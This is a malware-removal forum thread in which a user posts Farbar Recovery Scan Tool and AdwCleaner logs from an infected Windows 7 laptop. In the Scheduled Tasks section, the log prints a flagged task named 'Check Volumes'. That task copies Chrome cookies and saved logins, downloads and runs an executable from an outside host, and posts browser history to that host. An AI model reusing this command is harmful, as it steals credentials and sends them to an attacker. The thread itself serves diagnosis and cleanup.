Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}
Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{40BF1E83-20EB-11D8-97C5-0009C5020658}


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [5170 octets] - [26/10/2021 17:59:00]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########

Re: invalid certificates in browsers

Posted: 26 Oct 2021 17:57
by Rudy
OK. Post new FRST+Addition logs.

Re: invalid certificates in browsers

Posted: 26 Oct 2021 19:03
by Eddydye
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-10-2021
Ran by PC (administrator) on PC-PC (ASUSTeK Computer Inc. K50IJ) (26-10-2021 19:54:24)
Running from C:\Users\PC\Desktop
Loaded Profiles: PC
Platform: Microsoft Windows 7 Home Premium (X64) Language: Čeština (Česká republika)
Default browser: IE
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe
() [File not signed] C:\Program Files\ATKGFNEX\GFNEXSrv.exe
() [File not signed] C:\ProgramData\SoundFlowPicker\SoundFlowPicker.exe
(AlcorMicro Co., Ltd.) [File not signed] C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(ASUS) [File not signed] C:\Program Files (x86)\ASUS\ATK Media\DMedia.exe
(ASUSTeK Computer Inc. -> ) C:\Program Files (x86)\ASUS\ATK Hotkey\Atouch64.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ASUS CopyProtect\ASPG.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\AsLdrSrv.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\ATKOSD.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\HControl.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\HControlUser.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\KBFiltr.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\WDC.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATKOSD2\ATKOSD2.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\SmartLogon\sensorsrv.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\SmartLogon\smartlogon.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Windows\AsScrPro.exe
(ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Windows\System32\FBAgent.exe
(ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Windows\SysWOW64\Fast Boot\FastBootAgent.exe
(ASUSTeK Computer Inc. -> ATK) C:\Program Files\P4G\BatteryLife.exe
(ELAN Microelectronics Corporation -> ELAN Microelectronic Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler64.exe
(Google LLC -> Google LLC) C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\GoogleCrashHandler64.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\BM\TMBMSRV.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\SfCtlCom.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\TmProxy.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\UfSeAgnt.exe
(VIA) [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDECK.EXE

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [UfSeAgnt.exe] => C:\Program Files\Trend Micro\Internet Security\UfSeAgnt.exe [1022368 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [320000 2009-04-09] (AlcorMicro Co., Ltd.) [File not signed]
HKLM\...\Run: [ETDWare] => C:\Program Files\Elantech\ETDCtrl.exe [619392 2009-06-12] (ELAN Microelectronics Corporation -> ELAN Microelectronic Corp.)
HKLM-x32\...\Run: [HDAudDeck] => C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe [2244096 2009-07-13] (VIA) [File not signed]
HKLM-x32\...\Run: [HControlUser] => C:\Program Files (x86)\ASUS\ATK Hotkey\HControlUser.exe [105016 2009-06-19] (ASUSTeK Computer Inc. -> ASUS)
HKLM-x32\...\Run: [ATKOSD2] => C:\Program Files (x86)\ASUS\ATKOSD2\ATKOSD2.exe [8493624 2009-07-07] (ASUSTeK Computer Inc. -> ASUS)
HKLM-x32\...\Run: [ATKMEDIA] => C:\Program Files (x86)\ASUS\ATK Media\DMedia.exe [159744 2009-04-20] (ASUS) [File not signed]
HKLM-x32\...\Run: [Setwallpaper] => c:\programdata\SetWallpaper.cmd
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\...\Run: [Google Update] => C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\GoogleUpdateCore.exe [223816 2021-10-11] (Google LLC -> Google LLC)
HKLM\...\Windows x64\Print Processors\Canon MP250 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPD9W.DLL [28672 2010-04-24] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor MP250 series: C:\Windows\system32\CNMLM9W.DLL [336896 2010-04-24] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\95.0.4638.54\Installer\chrmstp.exe [2021-10-25] (Google LLC -> Google LLC) [File not signed]
HKLM\Software\...\Authentication\Credential Providers: [{06FE45A8-6D92-44ba-A0F1-9A9BCDC8F5A7}] -> C:\Program Files (x86)\ASUS\SmartLogon\system\FaceCredentialProvider64.dll [2009-05-01] (ASUS) [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FancyStart daemon.lnk [2009-10-06]
ShortcutTarget: FancyStart daemon.lnk -> C:\Windows\Installer\{60D6618B-153F-4353-8185-908E676E5888}\_DCE9A4DB2A5F2786140FA3.exe () [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\tmchlang.lnk [2009-10-06]
ShortcutTarget: tmchlang.lnk -> C:\Program Files\Trend Micro\Internet Security\TmChLang.exe (Trend Micro, Inc. -> Trend Micro Inc.)
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {2C093763-EE42-49CF-8891-F189A4AB542C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {326F35B1-9030-43D1-BD0D-5DBD49CECAFF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
Task: {3BA45A0D-24F6-4688-84BE-D1EA203FDFE0} - System32\Tasks\WC3 => C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe [1593344 2009-07-24] () [File not signed]
Task: {4CDF81D0-F7E2-48C8-817A-A530B90DD8DF} - System32\Tasks\Microsoft Windows Defender Update => C:\Program Files (x86)\Rezhabeck\mp3RenamerPro\mp3RenamerPro.exe
Task: {6E64456A-0201-4D80-BB77-5184B428C4FA} - System32\Tasks\Check Volumes => C:\Windows\SYSTEM32\CMD.EXE /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Local State" "C:\Users\PC\AppData\Local\Temp\OEROW4YA69" > NUL && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" http://1oivviovidwopopin.info/f2/OSJPN1IXJW.exe -s -k -o "C:\Users\PC\AppData\Local\Temp\OSJPN1IXJW.exe" && cd C:\Users\PC\AppData\Local\Temp\ && "OSJPN1IXJW.exe" V04J2WGO4Hf2 DYY04N8UKN 1Q541DFWIX OEROW4YA69 & copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\PC\AppData\Local\Temp\J1O2156BEB" > NUL && cd C:\Users\PC\AppData\Local\Temp\ && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" -X POST -H "Content-type: application/octet-stream" --data @J1O2156BEB http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppDa (the data entry has 678 more characters). <==== ATTENTION
Task: {74344F07-42C6-4622-9312-152A6B0AECFF} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {7A61CC45-675A-42D9-BC0A-D3691F5842ED} - System32\Tasks\ASUS SmartLogon Console Sensor => C:\Program Files (x86)\ASUS\SmartLogon\sensorsrv.exe [305720 2009-05-19] (ASUSTeK Computer Inc. -> ASUS)
Task: {CA21A731-91AF-4714-8E6F-CFE619DD08A0} - System32\Tasks\Games\UpdateCheck_S-1-5-21-1878501408-2484808434-785971923-1000 => {CA22F5B1-E06F-4A2B-94FC-21E87FE53781} C:\Windows\System32\gameux.dll [2746368 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Task: {E24D73D5-BC2A-4F11-90B0-83E312366154} - System32\Tasks\ASUS P4G => C:\Program Files\P4G\BatteryLife.exe [267832 2009-07-29] (ASUSTeK Computer Inc. -> ATK)
Task: {F53D1F2C-4DBF-4EB4-9E7F-45350BE21FBF} - System32\Tasks\ASPG => C:\Program Files (x86)\ASUS\ASUS CopyProtect\aspg.exe [163384 2009-06-29] (ASUSTeK Computer Inc. -> ASUS)
Task: {FF6375C1-1AC9-466C-80D7-F1443D3F6986} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 78.157.167.7 78.157.167.57
Tcpip\..\Interfaces\{6FBAB886-4307-4726-B9CB-F48F3A217E2B}: [DhcpNameServer] 78.157.167.7 78.157.167.57

FireFox:
========
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll [No File]
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.3 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll [2008-11-13] (Microsoft Corporation -> Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8051.1204 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2008-12-04] (Microsoft Corporation -> Microsoft Corporation)

Chrome:
=======
CHR Profile: C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default [2021-10-26]
CHR Notifications: Default -> hxxps//tadesco.org
CHR Extension: (Prezentace) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2021-01-03]
CHR Extension: (Dokumenty) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2021-01-03]
CHR Extension: (Disk Google) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-01-03]
CHR Extension: (YouTube) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2021-01-03]
CHR Extension: (Tabulky) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2021-01-03]
CHR Extension: (Dokumenty Google offline) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-10-25]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Extension: (Gmail) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-01-03]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ATKGFNEXSrv; C:\Program Files\ATKGFNEX\GFNEXSrv.exe [94208 2007-08-08] () [File not signed]
R2 FastBootAgent; C:\Windows\SysWOW64\Fast Boot\FastBootAgent.exe [306232 2009-07-24] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
S3 GoogleChromeElevationService; C:\Program Files\Google\Chrome\Application\95.0.4638.54\elevation_service.exe [1480024 2021-10-16] (Google LLC -> Google LLC) [File not signed]
R2 SfCtlCom; C:\Program Files\Trend Micro\Internet Security\SfCtlCom.exe [838528 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R2 SoundFlowPicker; C:\ProgramData\SoundFlowPicker\SoundFlowPicker.exe [1064960 2021-07-05] () [File not signed] <==== ATTENTION
R3 TMBMServer; C:\Program Files\Trend Micro\BM\TMBMSRV.exe [570632 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 TmProxy; C:\Program Files\Trend Micro\Internet Security\TmProxy.exe [917768 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ASMMAP64; C:\Program Files\ATKGFNEX\ASMMAP64.sys [14904 2007-07-24] (ASUSTeK Computer Inc. -> )
R3 athr; C:\Windows\System32\DRIVERS\athrx.sys [1394688 2009-06-20] (Microsoft Windows -> Atheros Communications, Inc.)
R3 ETD; C:\Windows\System32\DRIVERS\ETD.sys [112128 2009-06-12] (Microsoft Windows Hardware Compatibility Publisher -> ELAN Microelectronic Corp.)
R3 kbfiltr; C:\Windows\System32\DRIVERS\kbfiltr.sys [15416 2009-07-20] (ASUSTeK Computer Inc. -> )
R3 L1E; C:\Windows\System32\DRIVERS\L1E62x64.sys [55296 2009-06-09] (Microsoft Windows Hardware Compatibility Publisher -> Atheros Communications, Inc.)
R0 lullaby; C:\Windows\System32\DRIVERS\lullaby.sys [15928 2009-06-18] (ASUSTeK Computer Inc. -> Windows (R) Win 7 DDK provider)
R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1806400 2009-06-05] (SONIX TECHNOLOGY CO. , LTD -> )
R3 tmpreflt; C:\Windows\System32\DRIVERS\tmpreflt.sys [42000 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R1 tmtdi; C:\Windows\System32\DRIVERS\tmtdi.sys [107536 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 tmxpflt; C:\Windows\System32\DRIVERS\tmxpflt.sys [258064 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 vsapint; C:\Windows\System32\DRIVERS\vsapint.sys [1883152 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
U3 tmlwf; no ImagePath
U3 tmwfp; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-10-26 17:58 - 2021-10-26 18:00 - 000000000 ____D C:\AdwCleaner
2021-10-26 17:57 - 2021-10-26 17:57 - 008553680 _____ (Malwarebytes) C:\Users\PC\Desktop\AdwCleaner.exe
2021-10-26 16:52 - 2021-10-26 17:02 - 000028575 _____ C:\Users\PC\Desktop\Addition.txt
2021-10-26 16:47 - 2021-10-26 19:55 - 000015741 _____ C:\Users\PC\Desktop\FRST.txt
2021-10-26 16:47 - 2021-10-26 19:54 - 000000000 ____D C:\FRST
2021-10-26 16:42 - 2021-10-26 16:42 - 002310656 _____ (Farbar) C:\Users\PC\Desktop\FRST64.exe
2021-10-25 16:56 - 2021-10-25 16:56 - 000002244 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-10-25 16:56 - 2021-10-25 16:56 - 000002203 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-10-25 16:55 - 2021-10-25 16:55 - 000003388 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2021-10-25 16:55 - 2021-10-25 16:55 - 000003260 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2021-10-11 16:33 - 2021-10-11 16:33 - 001341272 _____ (Google LLC) C:\Users\PC\Downloads\ChromeSetup.exe

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-10-26 19:57 - 2021-08-05 15:40 - 000000824 _____ C:\Windows\system32\Drivers\etc\tmvsthfud.bin
2021-10-26 19:57 - 2021-08-05 15:40 - 000000824 _____ C:\Windows\system32\Drivers\etc\tmvsthfss.bin
2021-10-26 19:57 - 2021-07-13 16:04 - 000000004 _____ C:\ProgramData\rc.dat
2021-10-26 19:12 - 2021-07-13 16:03 - 000000004 _____ C:\ProgramData\lock.dat
2021-10-26 19:03 - 2009-07-14 06:45 - 000010016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2021-10-26 19:03 - 2009-07-14 06:45 - 000010016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2021-10-26 19:00 - 2021-01-03 19:43 - 000000000 ____D C:\Program Files (x86)\Google
2021-10-26 18:57 - 2021-07-13 16:03 - 000000060 _____ C:\ProgramData\lir.bats
2021-10-26 18:55 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2021-10-26 18:00 - 2009-10-06 11:32 - 000000000 ____D C:\Program Files (x86)\ASUS
2021-10-26 18:00 - 2009-10-06 11:16 - 000000000 ____D C:\Program Files (x86)\CyberLink
2021-10-26 17:51 - 2021-02-16 16:18 - 000002403 _____ C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-10-26 17:51 - 2021-02-16 16:18 - 000002366 _____ C:\Users\PC\Desktop\Google Chrome.lnk
2021-10-26 16:38 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\system32\NDF
2021-10-25 17:06 - 2009-10-06 11:35 - 000001145 _____ C:\Windows\system32\ServiceFilter.ini
2021-10-11 16:05 - 2021-02-16 16:16 - 000003558 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA
2021-10-11 16:05 - 2021-02-16 16:16 - 000003286 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core

==================== Files in the root of some directories ========

2021-07-13 16:03 - 2021-10-26 19:12 - 000000004 _____ () C:\ProgramData\lock.dat
2021-07-13 16:04 - 2021-10-26 19:57 - 000000004 _____ () C:\ProgramData\rc.dat
2021-07-13 16:03 - 2021-07-13 16:03 - 000000008 _____ () C:\ProgramData\ts.dat
2007-06-12 18:34 - 2007-06-12 18:34 - 000035822 _____ () C:\Program Files (x86)\Common Files\ASPG_icon.ico
2008-05-22 17:35 - 2008-05-22 17:35 - 000051962 _____ () C:\Program Files (x86)\Common Files\banner.jpg
2009-04-08 19:31 - 2009-04-08 19:31 - 000106496 _____ () C:\Program Files (x86)\Common Files\CPInstallAction.dll
2008-08-12 06:45 - 2008-08-12 06:45 - 000155648 _____ (ASUS) C:\Program Files (x86)\Common Files\MSIactionall.dll

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2021-03-31 16:37
==================== End of FRST.txt ========================


Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-10-2021
Ran by PC (26-10-2021 19:58:06)
Running from C:\Users\PC\Desktop
Microsoft Windows 7 Home Premium (X64) (2021-01-03 17:28:21)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================


(If an entry is included in the fixlist, it will be removed.)

Administrator (S-1-5-21-1878501408-2484808434-785971923-500 - Administrator - Disabled)
Guest (S-1-5-21-1878501408-2484808434-785971923-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1878501408-2484808434-785971923-1002 - Limited - Enabled)
PC (S-1-5-21-1878501408-2484808434-785971923-1000 - Administrator - Enabled) => C:\Users\PC

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Trend Micro Internet Security (Enabled - Up to date) {48929DFC-7A52-A34F-8351-C4DBEDBD9C50}
AS: Trend Micro Internet Security (Enabled - Up to date) {F3F37C18-5C68-ACC1-B9E1-FFA9963AD6ED}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Activation Assistant for the 2007 Microsoft Office suites (HKLM-x32\...\Activation Assistant for the 2007 Microsoft Office suites) (Version: - Microsoft Corporation)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 10 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 10.0.32.18 - Adobe Systems Incorporated)
Adobe Flash Player 10 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 10.0.32.18 - Adobe Systems Incorporated)
Adobe Reader 9.1 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated)
Alcor Micro USB Card Reader (HKLM-x32\...\InstallShield_{5A22D889-FBDD-4AE8-86EC-089D45FC133E}) (Version: 1.2.17.25001 - Alcor Micro Corp.)
Asistent pro přihlášení ke službě Windows Live (HKLM-x32\...\{1E779810-ACCA-4483-BC76-12DFE055B452}) (Version: 5.000.817.1 - Microsoft Corporation)
ASUS AI Recovery (HKLM-x32\...\{06585B02-F20D-4AB2-9A64-86EF2AE0F8F0}) (Version: 1.0.6 - ASUS)
ASUS CopyProtect (HKLM-x32\...\{6B77A7F6-DD63-4F13-A6FF-83137A5AC354}) (Version: 1.0.0015 - ASUS)
ASUS FancyStart (HKLM-x32\...\{60D6618B-153F-4353-8185-908E676E5888}) (Version: 1.0.5 - ASUSTeK Computer Inc.)
ASUS LifeFrame3 (HKLM-x32\...\{1DBD1F12-ED93-49C0-A7CC-56CBDE488158}) (Version: 3.0.20 - ASUS)
ASUS Live Update (HKLM-x32\...\{E657B243-9AD4-4ECC-BE81-4CCF8D667FD0}) (Version: 2.5.9 - ASUS)
ASUS MultiFrame (HKLM-x32\...\{9D48531D-2135-49FC-BC29-ACCDA5396A76}) (Version: 1.0.0019 - ASUS)
ASUS Power4Gear Hybrid (HKLM\...\{1686C4D1-B1FD-42E8-B7A8-FB4C4DBA5BA8}) (Version: 1.1.19 - ASUS)
ASUS SmartLogon (HKLM-x32\...\{64452561-169F-4A36-A2FF-B5E118EC65F5}) (Version: 1.0.0007 - ASUS)
Asus_Camera_ScreenSaver (HKLM-x32\...\Asus_Camera_ScreenSaver) (Version: 2.0.0009 - ASUS)
Atheros Communications Inc.(R) AR8121/AR8113/AR8114 Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.16 - Atheros Communications Inc.)
ATK Generic Function Service (HKLM-x32\...\{D3D54F3E-C5C3-443D-978F-87A72E5616E8}) (Version: 1.00.0008 - ATK)
ATK Hotkey (HKLM-x32\...\{7C05592D-424B-46CB-B505-E0013E8E75C9}) (Version: 1.0.0051 - ASUS)
ATK Media (HKLM-x32\...\{D1E5870E-E3E5-4475-98A6-ADD614524ADF}) (Version: 2.0.0005 - ASUS)
ATKOSD2 (HKLM-x32\...\{3B05F2FB-745B-4012-ADF2-439F36B2E70B}) (Version: 7.0.0005 - ASUS)
Canon MP250 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MP250_series) (Version: - Canon Inc.)
ETDWare PS/2-x64 7.0.5.5_WHQL (HKLM\...\Elantech) (Version: - )
Fast Boot (HKLM\...\{13F4A7F3-EABC-4261-AF6B-1317777F0755}) (Version: 1.0.3 - ASUS)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 95.0.4638.54 - Google LLC)
Google Chrome (HKU\S-1-5-21-1878501408-2484808434-785971923-1000\...\Google Chrome) (Version: 95.0.4638.54 - Google LLC)
Choice Guard (HKLM-x32\...\{8FFC5648-FAF8-43A3-BC8F-42BA1E275C4E}) (Version: 1.2.87.0 - Microsoft Corporation) Hidden
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: - Intel Corporation)
Junk Mail filter update (HKLM-x32\...\{4AB8B41B-3AF1-46BE-99B0-0ACD3B300C0A}) (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office Live Add-in 1.3 (HKLM-x32\...\{57F0ED40-8F11-41AA-B926-4A66D0D1A9CC}) (Version: 2.0.2313.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Nástroj pro odesílání služby Windows Live (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Trend Micro Internet Security (HKLM\...\{718D791F-F4E8-4aa7-98A6-15FDED17BDD0}) (Version: 17.50 - Trend Micro Inc.)
Trend Micro Internet Security (HKLM\...\{9D2B0322-44AE-460E-9283-4D2D7A9205AE}) (Version: 17.50 - Trend Micro Inc.) Hidden
USB 2.0 1.3M UVC WebCam (HKLM\...\USB 2.0 1.3M UVC WebCam) (Version: - )
VIA Platform Device Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.34 - VIA Technologies, Inc.)
